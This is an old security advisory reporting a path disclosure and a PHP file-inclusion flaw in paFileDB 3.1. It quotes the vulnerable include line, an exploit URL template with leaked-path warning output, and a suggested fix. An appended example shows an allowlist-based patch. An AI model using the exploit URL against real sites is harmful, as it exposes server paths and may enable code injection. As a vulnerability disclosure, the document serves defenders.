
| Subject: | [PersianHacker.net] Full Path Disclosure and PHP Injection In Pafiledb 3.1 Final |
|---|---|
| Date: | 31 Jan 2005 07:01:30 -0000 |
In the name of GOD

[Persianhacker.net] Full Path Disclosure and PHP Injection In Pafiledb 3.1 Final

PafileDB

paFileDB is designed to allow webmasters to have a database of files for download on their site. To add a download, all you do is upload the file using FTP or whatever method you use, log into paFileDB's admin center, and fill out a form to add a file. paFileDB lets you edit and delete the files too. No more messing with a bunch of HTML pages for a file database on your site! Using speedy MySQL for storing data, and powerful PHP for processing everything, paFileDB is one of the best and easiest ways to manage files!

More info @: http://www.phparena.net/pafiledb.php

Discussion:
--------------------

What is the bug?

There is a Full Path Disclosure vulnerability in Pafiledb 3.1 which leads to disclosure of the page's local location on the web server. There is another bug which lets h4cK3r inject PHP code and run it on the server.

Where is the bug?

At line 25 of pafiledb.php:

[
if ($login == "do") { include "./includes/$action/login.php"; exit; }
]

As we see, $action is used in the above statement and it's not declared yet, so h4ck3r can use it for PHP Injection attacks by passing his malicious string from the URL.

Exploit:
--------------------

[
http://www.example.com/pafiledb.php?login=do&action=[value]
]

which includes PHP code in:

[
./includes/[value]/login.php
]

and if the PHP page doesn't really exist at that address, the server returns a warning page like this:

[
Warning: main(./includes/value/login.php): failed to open stream: No such file or directory in /home/host/public_html/downloads/pafiledb.php on line 25
Warning: main(./includes/value/login.php): failed to open stream: No such file or directory in /home/host/public_html/downloads/pafiledb.php on line 25
Warning: main(): Failed opening './includes/value/login.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/host/public_html/downloads/pafiledb.php on line 25
]

and this message shows the local address of pafiledb.php on the server.

Solution:
--------------------

Just remove line 25 of pafiledb.php, there is no need for that line (I wonder why the coder ever used that?).

Credit:
--------------------

Discovered by PersianHacker.NET Security Team
by devil_box (d3vilbox yahoo com)
http://www.PersianHacker.NET

Special thanks to: Pi3cH, Herbod, Amectris, IDEspinner and all guys in PersianHacker.net

Help
--------------------

Path Disclosure Article (Farsi Language): http://www.persianhacker.net/articles/article-2208.html

More Help: visit http://www.PersianHacker.NET or mail me @: d3vilbox yahoo com

Note
--------------------

Script authors not contacted.

PS: sorry for my bad English

good luck
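Added example, not part of the original advisory and not paFileDB's own code: if the login dispatch at line 25 were kept rather than removed, this is one way to constrain the include to an allowlist and keep include warnings out of the response. The module names and the `resolve_login_include` helper are hypothetical, and the demo directory tree is constructed.

```php
<?php
// Added example: allowlisted replacement for include "./includes/$action/login.php".
// Module names are hypothetical, not paFileDB's real directory layout.
ini_set('display_errors', '0'); // keep include warnings (and paths) out of responses
ini_set('log_errors', '1');     // still record them server-side

const ALLOWED_ACTIONS = ['admin', 'team', 'user']; // hypothetical

/**
 * Return the real path of includes/<action>/login.php, or null when the action
 * is not allowlisted, the file is missing, or it resolves outside includes/.
 */
function resolve_login_include(string $baseDir, $action): ?string
{
    // Request values may be arrays (?action[]=x); accept exact string matches only.
    if (!is_string($action) || !in_array($action, ALLOWED_ACTIONS, true)) {
        return null;
    }
    $root = realpath($baseDir . '/includes');
    $path = realpath($baseDir . '/includes/' . $action . '/login.php');
    if ($root === false || $path === false) {
        return null; // missing file: caller shows a generic error, no path
    }
    // Defence in depth: the resolved file must still sit under includes/.
    $prefix = $root . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Constructed demo tree and sample inputs (not taken from the advisory).
$base = sys_get_temp_dir() . '/pafiledb_demo_' . getmypid();
mkdir($base . '/includes/admin', 0700, true);
file_put_contents($base . '/includes/admin/login.php', "<?php // stub\n");

foreach (['admin', 'team', 'value', '../uploads', ['x']] as $sample) {
    $resolved = resolve_login_include($base, $sample);
    printf("%-14s => %s\n", json_encode($sample, JSON_UNESCAPED_SLASHES),
        $resolved === null ? 'rejected' : 'include ' . basename(dirname($resolved)) . '/login.php');
}

// Remove the demo tree.
unlink($base . '/includes/admin/login.php');
rmdir($base . '/includes/admin');
rmdir($base . '/includes');
rmdir($base);
```

Only `admin` is accepted here: `team` is allowlisted but has no file in the demo tree, and the remaining samples fail the allowlist check before any path is built.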